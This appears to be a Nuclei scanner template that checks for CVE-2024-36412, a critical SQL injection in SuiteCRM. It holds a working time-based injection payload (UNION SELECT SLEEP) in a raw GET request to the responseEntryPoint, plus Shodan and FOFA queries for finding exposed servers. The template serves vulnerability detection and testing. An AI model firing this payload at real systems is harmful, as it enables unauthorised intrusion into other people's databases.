SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
PoC代码[已公开]
id: CVE-2024-36412
info:
name: SuiteCRM - SQL Injection
author: s4e-io
severity: critical
description: |
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
remediation: |
7.14.4 and 8.6.1
reference:
- https://0x5001.com/web-security/cve-2024-36412-proof-of-concept
- https://nvd.nist.gov/vuln/detail/CVE-2024-36412
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-36412
cwe-id: CWE-89
epss-score: 0.93615
epss-percentile: 0.99836
cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: salesagility
product: suitecrm
shodan-query: title:"SuiteCRM"
fofa-query: title="SuiteCRM"
tags: time-based-sqli,cve,cve2024,suitecrm,sqli
http:
- raw:
- |
@timeout: 15s
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- "status_code == 200"
- 'contains_any(body, "You have already responded to the invitation or there", "Thank you for accepting")'
condition: and
# digest: 4b0a004830460221009ebf1a9279149315e1b4a03ae6d8e820a59a2fe6e5d4fda4cc40f911b4b3f912022100af4626ec63da856cac0ee0d9277211ad3e7a2db5405b239359d7194edb192a92:922c64590222798bb761d5b6d8e72950